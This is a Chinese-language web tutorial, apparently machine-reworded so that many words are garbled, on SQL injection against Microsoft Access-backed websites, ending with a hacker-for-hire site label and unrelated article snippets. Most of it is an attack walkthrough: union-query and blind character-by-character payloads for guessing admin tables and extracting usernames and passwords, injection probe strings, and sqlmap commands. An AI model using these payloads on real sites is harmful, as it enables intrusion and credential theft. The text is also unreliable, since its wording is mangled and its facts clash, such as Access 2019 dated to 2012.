1.1运用sqlmap进行access注入
关于存在access注入的站点,能够经过手艺注入或许东西注入来获取access数据库中的表以及内容,特别是获取网站后台办理表中的用户名及其暗码。
1.1.1 access数据库简介
Microsoft Office Access是由微软发布的联系数据库办理体系。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特色,是Microsoft Office 的体系程序之一。Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发东西结合在一起的一个数据库办理体系。它是微软OFFICE的一个成员,在包括专业版和更高版其他office版别里边被单独出售。2012年12月4日,最新的微软Office Access 2019在微软Office 2019里发布,微软Office Access 2013 是前一个版别,默然装置Office是不装置Access数据库。
MS ACCESS以它自己的格局将数据存储在依据Access Jet的数据库引擎里。它还能够直接导入或许链接数据(这些数据存储在其他应用程序和数据库)。软件开发人员和数据架构师能够运用Microsoft Access开发应用软件,“高档用户”能够运用它来构建软件应用程序。和其他工作应用程序相同,ACCESS支撑Visual Basic宏言语,它是一个面向目标的编程言语,能够引证各种目标,包括DAO(数据拜访目标),ActiveX数据目标,以及许多其他的ActiveX组件。可视目标用于显现表和报表,他们的办法和特点是在VBA编程环境下,VBA代码模块能够声明和调用Windows操作体系函数。
(1)ACCESS数据库结构
ACCESS数据库选用表名-列名-内容数据,它不像MySQL和MSSQL,需求先创立数据库,然后创立表,输入内容到表中。ACCESS的数据库是一个mdb文件(例如data.mdb),一个库能够包括若干张表。
(2)操作ACCESS数据库
默许是在装置Office时挑选装置Access组件来创立数据库,对数据库中的表施行办理操作。也能够经过一些Access数据库拜访东西进行操作。
1.1.2Access注入根底
1. access注入根本流程
(1)判别有无注入
(2)猜解表名
(3)猜解字段
(4)猜解办理员字段值
(5)猜解用户名和暗码长度
(6)猜解用户名和暗码
(7)破解加密暗码
(8)寻觅并登录后台
2.常见的注入东西
常见的SQL注入东西有“HDSI 3.0 Goldsun洁净拓展版”、“Domain”、“Safe3”、“啊D东西”、“井蛙之见”、Havij、pangolin、WebCruiser和SQLmap等。现在只是SQLmap是开源,出于安全考虑,主张用sqlmap东西进行access注入。
3.常见的查询 ***
(1)联合查询法(速度快,兼容性欠好)
and 1=1 and 1=2 ——判别注入
order by 22 ——猜有多少列(12正确,13过错,则为12个)
union select 1,2,3,4,5,6,7,8,9,10,11,12from admin ——猜表名(报错阐明表名不存在,将admin表换成其他持续猜想)
union select 1,2,username,4,5,6,7,8,9,10,11,12from admin ——猜列名(列名方位放置页面上显现的数字方位上,报错阐明列名不存在,换列明持续猜,列名猜对后及出账号暗码)
(2)逐字猜解法(速度慢,兼容性好)
and 1=1 and 1=2 ——判别注入
and exists (select * from admin) ——猜表名
and exists (select user_name from admin) ——猜列名
查数据:1.确认长度 2.确认asc数据(asc编码)
and (select top 1 len(user_name ) fromadmin)=5(user_name 的长度=5,正常则=5,也能够用>,
and (select top 1 asc(mid(user_name ,1,1))from admin)=97 判别之一位(97代表‘a’的ascll值)
and (select top 1 asc(mid(user_name ,2,1))from admin)=97 判别第二位
(user_name =admin 之一位a 第二位d 第三位m 第四位i 第五位npass_word=a48e190fafc257d3)
4. 判别有无注入
(1)大略型:提交单引号’,id值-1、id值+1,判别页面显现信息不同或许犯错信息。
(2)逻辑型(数字型注入):and1=1 、and 1=2;正常显现,内容与正常页面显现的成果根本相同;提示BOF或EOF(程序没做任何判别时),或提示找不到记载,或显现内容为空(程序加了on error resume next);在数据库中是否履行,and 1=1 永远为真所以页面回来正常,and 1=2永远为假所以回来的成果会犯错,依据其成果来判别是否存在sql注入。
(3)逻辑型(字符型注入):’and ’1′=’1/’ 、and ’1′=’2
(4)逻辑型(搜索型注入):%’and 1=1 、and ‘%’='%/%’ 、and 1=2 and ‘%’='%
1.1.3SQLmap思路及指令
1. SQLmapaccess注入操作思路
(1)手艺判别url是否存在SQL注入。经过在url传入参数处参加“’”、and 1=1、and 1=2等,检查页面是否犯错,假如存在页面不相同或许有犯错信息,则标明网站url存在sql注入。常见的过错信息如下:
Microsoft JET Database Engine 过错 ’80040e14′
在联合查询中所选定的两个数据表或查询中的列数不匹配。
/view.asp,行 26
以上信息标明数据库选用Access数据库。
(2)运用sqlmap进行检测注入点是否可用
Sqlmap指令:sqlmap.py –uurl
假如存在,则会提示进行相应操作,例如判别数据库中的表,假如不存在则无法持续。
(3)检测表,履行“sqlmap.py–u url –tables”指令来获取access数据库表,需求挑选线程数,主张挑选1-20之间,这个数过大,会导致网站无法翻开。
[1] [2] [3] 黑客接单网
每一个高手在生长路上, 都需要与墙作足够的对立. 要么你成功, 站在国际之颠, 然后纵情罗致到尖端的常识; 或许或被它打趴下, 成为芸芸众生中的一人, 然后对它习以为常. 我也不破例. 前不久,...
简化、优化你的补丁办理 许多进犯机制,都是针对未修补的体系。所以,不论你的网络是否对外开放,都应该定时更新操作体系和应用程序。尽管这个主张归于陈词滥调,但从另一个旁边面也说明晰该主张的重要性。 关于W...
2019年5月至6月,unit42安全团队在一起针对科威特航运业的进犯事情中,检测到了一个新后门东西——Hisoka,它的作用是下载几个的定制东西进行后缝隙运用,一切东西好像都由同一个开发人员创立,最...
在本年的WitAwards 2019互联网安全年度评选中,阿里如此盾Web运用防火墙(WAF)以其技能和服务赢得了群众和评委的认可,斩获「年度云安全产品及服务」奖项。实际上,WAF已经成为企业看护we...
在进行查询时,最要害的部分之一是找到黑客的进口点,尤其是当运维团队将受进犯的服务器康复正常后,咱们意识到有许多的服务器现已被各种webshell、rootkits和暗码导出东西感染时。 需求快速的...
之前,我从没参加过GitHub官方的一些缝隙众测项目,在HackerOne建议的HackTheWorld竞赛中,主办方宣扬除了赏金以外,还有时机取得Github供给的终身无约束私有库(unlimit...